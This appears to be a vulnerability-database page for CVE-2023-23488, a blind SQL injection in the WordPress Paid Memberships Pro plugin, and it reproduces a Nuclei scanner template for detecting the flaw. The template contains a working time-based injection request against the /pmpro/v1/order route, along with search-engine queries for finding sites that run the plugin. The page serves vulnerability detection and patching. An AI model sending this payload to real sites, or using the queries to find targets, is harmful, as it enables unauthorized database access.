Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-23488
HistoryFeb 19, 2023 - 7:09 p.m.

WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection

2023-02-1919:09:46
ProjectDiscovery
github.com
38
cve2023
paid-memberships-pro
wordpress
tenable
packetstorm
sqli
wp-plugin
strangerstudios
rest-route
wp

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.054 Low

EPSS

Percentile

93.2%

WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2023-23488

info:
  name: WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection
  author: dwisiswant0
  severity: critical
  description: |
    WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
  remediation: |
    Upgrade to WordPress Paid Memberships Pro version 2.9.8 or later to mitigate this vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2023-2
    - https://wordpress.org/plugins/paid-memberships-pro/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-23488
    - http://packetstormsecurity.com/files/171661/WordPress-Paid-Memberships-Pro-2.9.8-SQL-Injection.html
    - https://github.com/CVEDB/PoC-List
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-23488
    cwe-id: CWE-89
    epss-score: 0.05363
    epss-percentile: 0.93093
    cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: strangerstudios
    product: paid_memberships_pro
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/
    fofa-query: body=/wp-content/plugins/paid-memberships-pro/
    publicwww-query: /wp-content/plugins/paid-memberships-pro/
    google-query: inurl:"/wp-content/plugins/paid-memberships-pro"
  tags: cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios

http:
  - raw:
      - |
        @timeout: 30s
        GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration_1>=7
          - status_code_1 != 403 # Wordfence
          - contains(body_2, "pmpro_updates")
        condition: and
# digest: 490a0046304402207aa83e6f293f332c02d8a9ada084af631fa84e58635b0ee65df029638fbd3409022048777f3132bb7ea017b47e5853e7742ade34d05d38b4da9edd3d8380dd197634:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.054 Low

EPSS

Percentile

93.2%